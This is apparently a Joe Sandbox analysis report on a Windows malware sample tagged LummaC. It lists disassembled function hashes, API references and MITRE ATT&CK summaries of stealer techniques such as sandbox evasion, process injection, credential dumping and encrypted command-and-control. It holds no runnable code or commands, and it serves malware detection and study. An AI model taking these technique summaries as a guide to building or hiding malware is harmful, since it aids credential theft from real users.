Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction ID: 143f1b5c514db3781b7ed53b682b0b41e9fbcdec9fb32babfcc3cf939cd4c23c
Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction Fuzzy Hash: B341097010C7C18AD365DB28849878FBFE16B96314F885A9CE6E94B3E2C7798445C753

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

@, xrefs: 00432227
A, xrefs: 00432268
[, xrefs: 00432245
Q, xrefs: 0043221D
e, xrefs: 00432231
[, xrefs: 00432259
X, xrefs: 004321F5
H, xrefs: 0043224F
X, xrefs: 004321EB
C, xrefs: 004321FF
E, xrefs: 00432213
@, xrefs: 00432263
J, xrefs: 00432209
L, xrefs: 0043223B

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 00A123FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00A1242D

Strings

e, xrefs: 00A12498
L, xrefs: 00A124A2
C, xrefs: 00A12466
@, xrefs: 00A1248E
X, xrefs: 00A12452
A, xrefs: 00A124CF
Q, xrefs: 00A12484
E, xrefs: 00A1247A
J, xrefs: 00A12470
H, xrefs: 00A124B6
X, xrefs: 00A1245C
@, xrefs: 00A124CA
[, xrefs: 00A124C0
[, xrefs: 00A124AC

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction ID: 92c214ac4be20f24a943ea0b864946a7b3898af846867fbc5a8c93891a85272a
Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction Fuzzy Hash: E241FA7000D7C19AD3659B28849878FBFE06BA7314F885A9CF6E84B3E2C7798449C753

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

w, xrefs: 00431F4F
p, xrefs: 00431F9F
p, xrefs: 00431FBF
n, xrefs: 00431FAF
e, xrefs: 00431F5F
z, xrefs: 00431F2F
A, xrefs: 00431F8F
z, xrefs: 00431F6F
v, xrefs: 00431F3F
e, xrefs: 00431F1F

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 00A12144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A1214E
VariantInit.OLEAUT32 ref: 00A12161

Strings

z, xrefs: 00A12196
e, xrefs: 00A121C6
z, xrefs: 00A121D6
n, xrefs: 00A12216
p, xrefs: 00A12226
p, xrefs: 00A12206
v, xrefs: 00A121A6
A, xrefs: 00A121F6
e, xrefs: 00A12186
w, xrefs: 00A121B6

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: f10ce58699ea60def4bd3b5efbdebb39be7bf17b4d3868fefdc9701c2964645e
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 1741252160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794545C763

Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
FreeLibrary.KERNEL32 ref: 0040B3B7

Strings

#v, xrefs: 0040B396, 0040B3B7

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IzDjbVdHha.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IzDjbVdHha.exe_1227802bef51cff559c46f51f543e565ca06f23_6beaad20_8e938bb1-c38c-461b-83e9-d748ba6b0504\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB878.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9B2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9F1.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
IzDjbVdHha.exe

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Function 0040ACF0 Relevance: 9.2, Strings: 7, Instructions: 430
COMMON

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Function 004218A0 Relevance: 3.2, Strings: 2, Instructions: 655
COMMON

Function 009E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 009E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON